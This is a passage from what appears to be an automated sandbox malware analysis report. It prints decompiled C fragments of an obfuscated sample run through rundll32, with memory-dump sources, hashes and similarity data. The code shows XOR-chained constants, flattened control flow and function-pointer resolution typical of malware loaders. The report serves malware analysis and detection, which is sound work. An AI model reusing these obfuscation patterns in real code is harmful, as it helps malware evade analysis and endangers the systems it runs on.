				if(_t106 != 0) {
					_push(_v8);
					_push(_v24);
					_push(_v12);
					_t108 = E002D8606(_v16, 0x2c1378, _t134);
					_push(_v20);
					_t130 = _t108;
					_push(_t108);
					_push(_v40);
					_t109 = E002CCBDF(_v28,  *((intOrPtr*)(_t128 + 0x38)));
					if(_t109 != 0) {
						 *_t109();
					}
					E002CA8B0(_v36, _t130, _v32);
				}
				return 0;
			}





















                                                                                                                                    0x002c4c63
                                                                                                                                    0x002c4c69
                                                                                                                                    0x002c4c70
                                                                                                                                    0x002c4c77
                                                                                                                                    0x002c4c7e
                                                                                                                                    0x002c4c82
                                                                                                                                    0x002c4c86
                                                                                                                                    0x002c4c8d
                                                                                                                                    0x002c4c94
                                                                                                                                    0x002c4c9b
                                                                                                                                    0x002c4ca8
                                                                                                                                    0x002c4cad
                                                                                                                                    0x002c4cb2
                                                                                                                                    0x002c4cb9
                                                                                                                                    0x002c4cc4
                                                                                                                                    0x002c4cc7
                                                                                                                                    0x002c4cca
                                                                                                                                    0x002c4ccd
                                                                                                                                    0x002c4cd1
                                                                                                                                    0x002c4cd8
                                                                                                                                    0x002c4cdf
                                                                                                                                    0x002c4ce3
                                                                                                                                    0x002c4cea
                                                                                                                                    0x002c4cf1
                                                                                                                                    0x002c4cf8
                                                                                                                                    0x002c4cff
                                                                                                                                    0x002c4d03
                                                                                                                                    0x002c4d0a
                                                                                                                                    0x002c4d11
                                                                                                                                    0x002c4d1d
                                                                                                                                    0x002c4d1e
                                                                                                                                    0x002c4d23
                                                                                                                                    0x002c4d2a
                                                                                                                                    0x002c4d31
                                                                                                                                    0x002c4d38
                                                                                                                                    0x002c4d3f
                                                                                                                                    0x002c4d46
                                                                                                                                    0x002c4d4d
                                                                                                                                    0x002c4d5c
                                                                                                                                    0x002c4d64
                                                                                                                                    0x002c4d67
                                                                                                                                    0x002c4d6e
                                                                                                                                    0x002c4d75
                                                                                                                                    0x002c4d79
                                                                                                                                    0x002c4d80
                                                                                                                                    0x002c4d8a
                                                                                                                                    0x002c4d8d
                                                                                                                                    0x002c4d8f
                                                                                                                                    0x002c4d92
                                                                                                                                    0x002c4d9a
                                                                                                                                    0x002c4d9d
                                                                                                                                    0x002c4da3
                                                                                                                                    0x002c4da8
                                                                                                                                    0x002c4dab
                                                                                                                                    0x002c4dad
                                                                                                                                    0x002c4dae
                                                                                                                                    0x002c4db7
                                                                                                                                    0x002c4dc1
                                                                                                                                    0x002c4dc3
                                                                                                                                    0x002c4dc3
                                                                                                                                    0x002c4dcd
                                                                                                                                    0x002c4dd3
                                                                                                                                    0x002c4dda

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: <,:q$J~
                                                                                                                                    • API String ID: 0-951887683
                                                                                                                                    • Opcode ID: 1973269059d88faa7896798448e54df35c01b6966fc70b95225b41a448ebad0b
                                                                                                                                    • Instruction ID: 103f618c63bf3b5bc8cb380b972ce6e03fda4297cbe3efd7b7d0c468ba4807f1
                                                                                                                                    • Opcode Fuzzy Hash: 1973269059d88faa7896798448e54df35c01b6966fc70b95225b41a448ebad0b
                                                                                                                                    • Instruction Fuzzy Hash: 66411E71D0130EABDF08DFA1C94AAEEBBB1FB54314F208199D401BA2A0D7B50B55CFA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CEE81 Relevance: 2.6, Strings: 2, Instructions: 95COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E002CEE81(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				short _v48;
				short _v52;
				intOrPtr _v56;
				char _v576;
				intOrPtr* _t95;
				signed int _t99;
				signed int _t100;

				_v56 = 0x3b8b1c;
				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_v8 = 0xf9e323;
				_v8 = _v8 ^ 0x73816ffa;
				_v8 = _v8 + 0x5b26;
				_v8 = _v8 ^ 0x387262e7;
				_v8 = _v8 ^ 0x4b076809;
				_v20 = 0x75aab0;
				_v20 = _v20 ^ 0xc40c30fa;
				_v20 = _v20 + 0x78e9;
				_v20 = _v20 ^ 0xc4737271;
				_v16 = 0xa8e87a;
				_v16 = _v16 + 0xffff799a;
				_t99 = 0x33;
				_v16 = _v16 / _t99;
				_v16 = _v16 ^ 0x000fed3f;
				_v28 = 0x7feeb5;
				_v28 = _v28 + 0xffffe4f6;
				_v28 = _v28 ^ 0x007d0c9c;
				_v32 = 0x59c916;
				_t100 = 0x5d;
				_v32 = _v32 / _t100;
				_v32 = _v32 ^ 0x000d1fec;
				_v12 = 0x866588;
				_v12 = _v12 ^ 0x68ade4cb;
				_v12 = _v12 + 0xffffbaa5;
				_v12 = _v12 ^ 0x68223e43;
				_v36 = 0xbafac2;
				_v36 = _v36 ^ 0x5e34b155;
				_v36 = _v36 ^ 0x5e8c811c;
				_v24 = 0xc770cb;
				_v24 = _v24 >> 0xf;
				_v24 = _v24 ^ 0x95635bf4;
				_v24 = _v24 ^ 0x956359d7;
				_v40 = 0xbd0b83;
				_v40 = _v40 >> 3;
				_v40 = _v40 ^ 0x001e2563;
				_t101 = _v8;
				if(E002D8F15(_v8,  &_v576, _t100, _v20, _v16, _v28) != 0) {
					_t95 =  &_v576;
					if(_v576 != 0) {
						while( *_t95 != 0x5c) {
							_t95 = _t95 + 2;
							if( *_t95 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t101 = 0;
						 *((short*)(_t95 + 2)) = 0;
					}
					L6:
					E002DDB43(_t101,  &_v44, _t101, _v32, _t101,  &_v576, _t101, _v12, _t101, _v36, _v24, _v40);
				}
				return _v44;
			}




















                                                                                                                                    0x002cee8a
                                                                                                                                    0x002cee96
                                                                                                                                    0x002cee99
                                                                                                                                    0x002cee9c
                                                                                                                                    0x002cee9f
                                                                                                                                    0x002ceea6
                                                                                                                                    0x002ceead
                                                                                                                                    0x002ceeb4
                                                                                                                                    0x002ceebb
                                                                                                                                    0x002ceec2
                                                                                                                                    0x002ceec9
                                                                                                                                    0x002ceed0
                                                                                                                                    0x002ceed7
                                                                                                                                    0x002ceede
                                                                                                                                    0x002ceee5
                                                                                                                                    0x002ceef1
                                                                                                                                    0x002ceef6
                                                                                                                                    0x002ceefb
                                                                                                                                    0x002cef02
                                                                                                                                    0x002cef09
                                                                                                                                    0x002cef10
                                                                                                                                    0x002cef17
                                                                                                                                    0x002cef21
                                                                                                                                    0x002cef2a
                                                                                                                                    0x002cef2d
                                                                                                                                    0x002cef34
                                                                                                                                    0x002cef3b
                                                                                                                                    0x002cef48
                                                                                                                                    0x002cef4f
                                                                                                                                    0x002cef56
                                                                                                                                    0x002cef5d
                                                                                                                                    0x002cef64
                                                                                                                                    0x002cef6b
                                                                                                                                    0x002cef72
                                                                                                                                    0x002cef76
                                                                                                                                    0x002cef7d
                                                                                                                                    0x002cef84
                                                                                                                                    0x002cef8b
                                                                                                                                    0x002cef8f
                                                                                                                                    0x002cefa0
                                                                                                                                    0x002cefad
                                                                                                                                    0x002cefaf
                                                                                                                                    0x002cefbc
                                                                                                                                    0x002cefbe
                                                                                                                                    0x002cefc4
                                                                                                                                    0x002cefca
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cefcc
                                                                                                                                    0x00000000
                                                                                                                                    0x002cefca
                                                                                                                                    0x002cefce
                                                                                                                                    0x002cefd0
                                                                                                                                    0x002cefd0
                                                                                                                                    0x002cefd4
                                                                                                                                    0x002ceff2
                                                                                                                                    0x002ceff7
                                                                                                                                    0x002cf001

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: C>"h$br8
                                                                                                                                    • API String ID: 0-573140060
                                                                                                                                    • Opcode ID: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                                    • Instruction ID: 7e5a9ae09fb1965142be88d85156b0df4a0e951430ea2e7d80fd1fcdf2484d12
                                                                                                                                    • Opcode Fuzzy Hash: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                                    • Instruction Fuzzy Hash: 9341E071C0121AEBCF18CFE4C94A9EEBBB5FB04304F20819AE515B6260E3B45A55CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DAA30 Relevance: 2.6, Strings: 2, Instructions: 67COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E002DAA30(signed int __edx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t83;
				signed int _t85;
				signed int _t91;

				_v40 = _v40 & 0x00000000;
				_v48 = 0xea50c7;
				_v44 = 0x183406;
				_v8 = 0x4cb37c;
				_v8 = _v8 + 0xc736;
				_v8 = _v8 + 0xd4a7;
				_t91 = __edx;
				_t85 = 0x64;
				_v8 = _v8 * 0x2d;
				_v8 = _v8 ^ 0x0dcd94f9;
				_v24 = 0x238f3e;
				_v24 = _v24 << 3;
				_v24 = _v24 ^ 0x011b8be3;
				_v20 = 0x73abc8;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x00035013;
				_v16 = 0x5012b6;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 / _t85;
				_v16 = _v16 ^ 0x000aff4c;
				_v12 = 0x8c34bb;
				_v12 = _v12 | 0x8c5a3f77;
				_v12 = _v12 + 0xffff11fb;
				_v12 = _v12 ^ 0x2d4fbea1;
				_v12 = _v12 ^ 0xa19c1e56;
				_v36 = 0xff820a;
				_v36 = _v36 | 0x4fe4a4bc;
				_v36 = _v36 ^ 0x4ffdd4f4;
				_v32 = 0x36506a;
				_v32 = _v32 + 0x4de;
				_v32 = _v32 ^ 0x003709b9;
				_v28 = 0x64fd3b;
				_v28 = _v28 + 0xffff3e7a;
				_v28 = _v28 ^ 0x00656766;
				if( *((intOrPtr*)(0x2e3210 + __edx * 4)) == 0) {
					_t83 = E002D0A0E(_t85, _t85, _a4);
					_push(_v28);
					_push(_a12);
					_push(_v32);
					_push(_t83);
					 *((intOrPtr*)(0x2e3210 + _t91 * 4)) = E002CCDCD(_v12, _v36);
				}
				return  *((intOrPtr*)(0x2e3210 + _t91 * 4));
			}

















                                                                                                                                    0x002daa36
                                                                                                                                    0x002daa3a
                                                                                                                                    0x002daa41
                                                                                                                                    0x002daa48
                                                                                                                                    0x002daa4f
                                                                                                                                    0x002daa56
                                                                                                                                    0x002daa62
                                                                                                                                    0x002daa68
                                                                                                                                    0x002daa69
                                                                                                                                    0x002daa6c
                                                                                                                                    0x002daa73
                                                                                                                                    0x002daa7a
                                                                                                                                    0x002daa7e
                                                                                                                                    0x002daa85
                                                                                                                                    0x002daa8c
                                                                                                                                    0x002daa90
                                                                                                                                    0x002daa97
                                                                                                                                    0x002daa9e
                                                                                                                                    0x002daaa7
                                                                                                                                    0x002daaaa
                                                                                                                                    0x002daab1
                                                                                                                                    0x002daab8
                                                                                                                                    0x002daabf
                                                                                                                                    0x002daac6
                                                                                                                                    0x002daacd
                                                                                                                                    0x002daad4
                                                                                                                                    0x002daadb
                                                                                                                                    0x002daae2
                                                                                                                                    0x002daae9
                                                                                                                                    0x002daaf0
                                                                                                                                    0x002daaf7
                                                                                                                                    0x002daafe
                                                                                                                                    0x002dab05
                                                                                                                                    0x002dab0c
                                                                                                                                    0x002dab1b
                                                                                                                                    0x002dab2e
                                                                                                                                    0x002dab33
                                                                                                                                    0x002dab36
                                                                                                                                    0x002dab39
                                                                                                                                    0x002dab42
                                                                                                                                    0x002dab4b
                                                                                                                                    0x002dab4b
                                                                                                                                    0x002dab5d

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: fge$jP6
                                                                                                                                    • API String ID: 0-775479084
                                                                                                                                    • Opcode ID: 3012190e4f00433294273ce5f3a6bdcb3f38276572ac6e89953ebcd59660128e
                                                                                                                                    • Instruction ID: 597911b4bdd8ad9b363649ae8f04826339dd081826476b0eb471d96e5840cab6
                                                                                                                                    • Opcode Fuzzy Hash: 3012190e4f00433294273ce5f3a6bdcb3f38276572ac6e89953ebcd59660128e
                                                                                                                                    • Instruction Fuzzy Hash: 0031C1B5C1020DEBCF48CFA5CA8A9DEBBB5FB09318F108199D551B6220C3B95B49CF95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002E0E3A Relevance: 2.6, Strings: 2, Instructions: 61COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E002E0E3A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t61;
				intOrPtr _t66;
				void* _t73;
				intOrPtr* _t74;

				_t74 = _a16;
				_push(_t74);
				_push(_a12);
				_t73 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002D20B9(_t61);
				_v16 = 0x2b4f5d;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000abada;
				_v24 = 0x6f176d;
				_v24 = _v24 | 0x8892b5fd;
				_v24 = _v24 ^ 0x88fd6dba;
				_v12 = 0x9049ef;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x7aa47b64;
				_v12 = _v12 ^ 0x7aa68413;
				_a16 = 0x9c064;
				_a16 = _a16 + 0x4e6a;
				_a16 = _a16 + 0xffffd44e;
				_a16 = _a16 | 0x475ceb65;
				_a16 = _a16 ^ 0x47532e3d;
				_v8 = 0xaf6c6f;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xad29;
				_v8 = _v8 + 0xd52;
				_v8 = _v8 ^ 0x000b7d9e;
				_v20 = 0xd79f7b;
				_v20 = _v20 ^ 0x214a9efd;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x010f9d8f;
				E002D0DAF(_v16, __ecx, _v24,  *((intOrPtr*)(_t74 + 4)), _v12, _a16);
				E002CED7E(_v8,  *((intOrPtr*)(__ecx + 0x24)), _v20,  *_t74,  *((intOrPtr*)(_t74 + 4)));
				_t66 =  *((intOrPtr*)(_t74 + 4));
				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) + _t66;
				return _t66;
			}












                                                                                                                                    0x002e0e41
                                                                                                                                    0x002e0e45
                                                                                                                                    0x002e0e46
                                                                                                                                    0x002e0e49
                                                                                                                                    0x002e0e4b
                                                                                                                                    0x002e0e4e
                                                                                                                                    0x002e0e52
                                                                                                                                    0x002e0e53
                                                                                                                                    0x002e0e58
                                                                                                                                    0x002e0e65
                                                                                                                                    0x002e0e68
                                                                                                                                    0x002e0e6c
                                                                                                                                    0x002e0e73
                                                                                                                                    0x002e0e7a
                                                                                                                                    0x002e0e81
                                                                                                                                    0x002e0e88
                                                                                                                                    0x002e0e8f
                                                                                                                                    0x002e0e93
                                                                                                                                    0x002e0e9a
                                                                                                                                    0x002e0ea1
                                                                                                                                    0x002e0ea8
                                                                                                                                    0x002e0eaf
                                                                                                                                    0x002e0eb6
                                                                                                                                    0x002e0ebd
                                                                                                                                    0x002e0ec4
                                                                                                                                    0x002e0ecb
                                                                                                                                    0x002e0ecf
                                                                                                                                    0x002e0ed6
                                                                                                                                    0x002e0edd
                                                                                                                                    0x002e0ee4
                                                                                                                                    0x002e0eeb
                                                                                                                                    0x002e0ef2
                                                                                                                                    0x002e0ef6
                                                                                                                                    0x002e0f0c
                                                                                                                                    0x002e0f1f
                                                                                                                                    0x002e0f24
                                                                                                                                    0x002e0f2a
                                                                                                                                    0x002e0f32

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: =.SG$]O+
                                                                                                                                    • API String ID: 0-348654084
                                                                                                                                    • Opcode ID: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                                    • Instruction ID: 266a4d4fe215b7b126b155644e95b55487d966ef3db6e3b7d46b7905db68b5e3
                                                                                                                                    • Opcode Fuzzy Hash: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                                    • Instruction Fuzzy Hash: 1421347180120DEFCF05DFA5DA4A8AEBBB1FF45304F208599E92562224C3B19B24DFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001CD16 Relevance: 1.9, APIs: 1, Instructions: 445COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog3
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                    • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                                    • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                                    • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                                    • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D044F Relevance: 1.5, Strings: 1, Instructions: 287COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                    			E002D044F() {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t309;
				intOrPtr _t310;
				void* _t311;
				intOrPtr _t321;
				intOrPtr _t325;
				void* _t329;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr _t369;
				void* _t373;
				intOrPtr _t374;
				void* _t379;
				signed int* _t383;

				_t383 =  &_v140;
				_v16 = 0x8f0e94;
				_v12 = 0x9bdfd3;
				_t329 = 0;
				_v8 = _v8 & 0;
				_v4 = _v4 & 0;
				_v68 = 0xf0a33d;
				_v68 = _v68 ^ 0x64690d06;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x00c9335c;
				_v96 = 0x45a6c;
				_v96 = _v96 + 0xffff2947;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 ^ 0x00000003;
				_v56 = 0xab09eb;
				_v56 = _v56 | 0x7e070137;
				_v56 = _v56 ^ 0x7eaf09ff;
				_v80 = 0xa0f766;
				_v80 = _v80 | 0xafeefcb7;
				_v80 = _v80 ^ 0xafeefff7;
				_v48 = 0xf26de0;
				_v48 = _v48 + 0xffff1ff1;
				_v48 = _v48 ^ 0x00f18dd1;
				_v76 = 0x20d89d;
				_v76 = _v76 + 0xffff51c8;
				_v76 = _v76 | 0xd50d8457;
				_v76 = _v76 ^ 0xd52cfd33;
				_v136 = 0x1fce72;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 | 0xd51e44d2;
				_t331 = 7;
				_v136 = _v136 / _t331;
				_v136 = _v136 ^ 0x1e7b1fff;
				_t379 = 0x1e2498b;
				_v92 = 0x2fa0bb;
				_v92 = _v92 >> 7;
				_v92 = _v92 << 1;
				_v92 = _v92 ^ 0x0000a534;
				_v52 = 0x3913b;
				_t332 = 0x4f;
				_v52 = _v52 / _t332;
				_v52 = _v52 ^ 0x00068b65;
				_v104 = 0xfffd78;
				_v104 = _v104 | 0x3b05e9e1;
				_v104 = _v104 + 0x741e;
				_v104 = _v104 ^ 0x7591a7da;
				_v104 = _v104 ^ 0x4990882f;
				_v84 = 0xe3d15a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0xbeb387df;
				_v84 = _v84 ^ 0x5d62ae1e;
				_v24 = 0xb3d42d;
				_v24 = _v24 | 0x6ee5a57e;
				_v24 = _v24 ^ 0x6efe8c67;
				_v60 = 0x6708ad;
				_v60 = _v60 + 0xd3fd;
				_v60 = _v60 ^ 0x0061923e;
				_v128 = 0x5551d4;
				_t333 = 0x50;
				_v128 = _v128 / _t333;
				_t334 = 0x7a;
				_v128 = _v128 / _t334;
				_t335 = 0x7e;
				_v128 = _v128 * 0x46;
				_v128 = _v128 ^ 0x000c63e9;
				_v28 = 0xd668f8;
				_v28 = _v28 << 0x10;
				_v28 = _v28 ^ 0x68f34519;
				_v112 = 0x194a18;
				_v112 = _v112 / _t335;
				_v112 = _v112 | 0xa7c33fbe;
				_t336 = 0x65;
				_v112 = _v112 / _t336;
				_v112 = _v112 ^ 0x01a285cf;
				_v44 = 0xc79794;
				_v44 = _v44 ^ 0x35aba003;
				_v44 = _v44 ^ 0x356e5b19;
				_v140 = 0x380362;
				_t337 = 0x79;
				_v140 = _v140 * 5;
				_v140 = _v140 ^ 0x1d7b2daf;
				_v140 = _v140 + 0x590f;
				_v140 = _v140 ^ 0x1c6cd8ab;
				_v120 = 0x1c8328;
				_v120 = _v120 / _t337;
				_t338 = 0xa;
				_v120 = _v120 / _t338;
				_v120 = _v120 | 0x9d020d0f;
				_v120 = _v120 ^ 0x9d02076d;
				_v124 = 0x55cbd6;
				_v124 = _v124 >> 9;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 >> 6;
				_v124 = _v124 ^ 0x000fb83a;
				_v132 = 0xf0ac8c;
				_v132 = _v132 | 0x3804c269;
				_v132 = _v132 >> 1;
				_v132 = _v132 + 0xffff8da8;
				_v132 = _v132 ^ 0x1c781e64;
				_v88 = 0x7992e8;
				_v88 = _v88 | 0xba3027fa;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x0051fda0;
				_v36 = 0x7aefbd;
				_v36 = _v36 + 0xfffff4eb;
				_v36 = _v36 ^ 0x0078a7fc;
				_v40 = 0xf56b46;
				_v40 = _v40 + 0xffff9ce0;
				_v40 = _v40 ^ 0x00fe48d4;
				_v108 = 0x27569f;
				_v108 = _v108 + 0x2c0a;
				_v108 = _v108 ^ 0xb442ac8c;
				_v108 = _v108 ^ 0xdc856b2a;
				_v108 = _v108 ^ 0x68e3c0da;
				_v116 = 0xbcba21;
				_v116 = _v116 << 0xd;
				_v116 = _v116 << 8;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x011b605a;
				_v32 = 0x87c31e;
				_v32 = _v32 ^ 0x05bc26b1;
				_v32 = _v32 ^ 0x05363b16;
				_v100 = 0x4be1cd;
				_v100 = _v100 + 0xffff13dd;
				_v100 = _v100 | 0xdbf19b4f;
				_v100 = _v100 >> 7;
				_v100 = _v100 ^ 0x01b90151;
				_v64 = 0xb1223e;
				_v64 = _v64 | 0xb1fef6fe;
				_v64 = _v64 ^ 0xb1f65c82;
				_v72 = 0x9ef2a7;
				_v72 = _v72 * 0x66;
				_v72 = _v72 + 0xffffefd1;
				_v72 = _v72 ^ 0x3f51caaf;
				while(1) {
					L1:
					while(1) {
						_t309 = 0x546d98;
						do {
							L3:
							if(_t379 == _t309) {
								_t310 =  *0x2e3e00; // 0x0
								_t339 = _v56;
								_t311 = E002D0DD6(_t339, _v124, _v132, _v20,  *((intOrPtr*)(_t310 + 0x14)),  *((intOrPtr*)(_t310 + 0x10)), _v88, _v36);
								_t383 =  &(_t383[6]);
								__eflags = _t311 - _v80;
								if(__eflags != 0) {
									_t379 = 0x64eb485;
									goto L14;
								} else {
									_t379 = 0xb6ab68a;
									_t329 = 1;
									goto L1;
								}
							} else {
								if(_t379 == 0x19763e8) {
									_push(_v128);
									_push(_v60);
									__eflags = E002C9462(E002DDCF7(_v24, 0x2c17f8, __eflags), _v112,  &_v20, 0, _v44, _v68) - _v96;
									_t339 = _v140;
									_t379 =  ==  ? 0x546d98 : 0x64eb485;
									E002CA8B0(_t339, _t313, _v120);
									_t383 =  &(_t383[8]);
									L14:
									_t369 =  *0x2e3e00; // 0x0
									_t309 = 0x546d98;
									goto L15;
								} else {
									if(_t379 == 0x1e2498b) {
										_push(_t339);
										_push(_t339);
										_t373 = 0x28;
										_t321 = E002C7FF2(_t373);
										 *0x2e3e00 = _t321;
										 *((intOrPtr*)(_t321 + 0x14)) = 0x4000;
										_t374 =  *0x2e3e00; // 0x0
										_t325 = E002C7FF2( *((intOrPtr*)(_t374 + 0x14)));
										_t369 =  *0x2e3e00; // 0x0
										_t379 = 0x19763e8;
										_t339 =  *((intOrPtr*)(_t369 + 0x14)) + _t325;
										 *((intOrPtr*)(_t369 + 0x10)) = _t325;
										 *((intOrPtr*)(_t369 + 0x1c)) = _t325;
										 *((intOrPtr*)(_t369 + 0x24)) = _t325;
										 *(_t369 + 4) = _t339;
										_t309 = 0x546d98;
										continue;
									} else {
										if(_t379 == 0x64eb485) {
											E002D8519(_v32, _v100,  *((intOrPtr*)(_t369 + 0x10)));
											E002D8519(_v64, _v72,  *0x2e3e00);
										} else {
											if(_t379 != 0xb6ab68a) {
												goto L15;
											} else {
												E002C957D(_v20, _v40, _v108, _v48, _v116);
											}
										}
									}
								}
							}
							L18:
							return _t329;
							L15:
							__eflags = _t379 - 0xfde45c5;
						} while (__eflags != 0);
						goto L18;
					}
				}
			}


























































                                                                                                                                    0x002d044f
                                                                                                                                    0x002d0459
                                                                                                                                    0x002d0466
                                                                                                                                    0x002d0471
                                                                                                                                    0x002d0473
                                                                                                                                    0x002d047a
                                                                                                                                    0x002d0481
                                                                                                                                    0x002d0489
